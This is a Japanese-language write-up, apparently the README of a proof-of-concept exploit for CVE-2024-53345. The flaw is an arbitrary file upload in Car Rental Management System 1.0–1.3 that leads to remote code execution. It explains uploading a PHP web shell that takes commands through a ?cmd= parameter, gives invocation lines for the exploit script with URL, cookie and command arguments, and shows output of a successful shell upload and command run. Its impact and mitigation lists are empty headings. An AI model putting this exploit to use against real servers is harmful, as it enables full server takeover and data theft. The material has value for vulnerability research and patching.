
カー・レンタル管理システム バージョン1.0〜1.3における重大な0 Day
Car Rental Management System バージョン 1.0〜1.3 における重大な 0 Day 脆弱性
Car Rental Management System(バージョン 1.0〜1.3)の System Settings モジュールのファイルアップロード機能に重大な脆弱性が存在し、低権限ユーザーが実行可能な PHP スクリプトを含む任意のファイルをアップロードできるようになっています。この脆弱性は、ファイルタイプの検証が不十分で、アップロードディレクトリへのアクセス制御が適切でないことに起因し、攻撃者が悪意のあるファイルをアップロードし、認証なしで公にアクセスできるようになります。
この欠陥を悪用すると、攻撃者は PHP シェルをアップロードし、アップロードしたファイルの URL に ?cmd= を追加することで、後からリモートでコマンドを実行できます。これによりリモートコード実行(RCE)が可能になり、サーバー全体の侵害につながる可能性があります。悪用されると、機密データへの不正アクセス、権限昇格、ネットワーク内での水平移動(ラテラルムーブメント)などの被害が発生する可能性があります。
デフォルト構成: System Settings モジュールのアップロード機能にアクセスするには、低権限のユーザーアカウントが必要です。
サイト固有の構成: 一部のセットアップでは、ファイルアップロード機能が一般公開されている場合があり、攻撃者はユーザーアカウントを必要とせずにこの脆弱性を悪用できます。
この脆弱性は、リモートコード実行を可能にするため重大です。結果として以下が発生する可能性があります:
この脆弱性を軽減するには:
python CVE-2024-53345.py -u "URL" -c "COOKIE" -cmd "COMMAND"
python3 CVE-2024-53345.py -u "URL" -c "COOKIE" -cmd "COMMAND"
-u or --url: Car Rental Management System のベース URL を指定します。
-c or --cookie: アップロードリクエストを認証するための低権限ユーザーの PHP セッション ID(PHPSESSID)を指定します。 例: 3952gmkk9uqf1csqgcmqo58qc0
-cmd or --command: シェルがアップロードされた後にサーバー上で実行するコマンドを指定します。 例: hostname
[+] Attempting to upload shell...
[+] Shell uploaded successfully. Check the /car_rental/admin/assets/uploads/ directory.
[+] Found uploaded PHP files: ['1730189880_php.php']
[+] Executing command 'whoami' on the uploaded shell...
[+] Command Output:
Desktop-Demo\User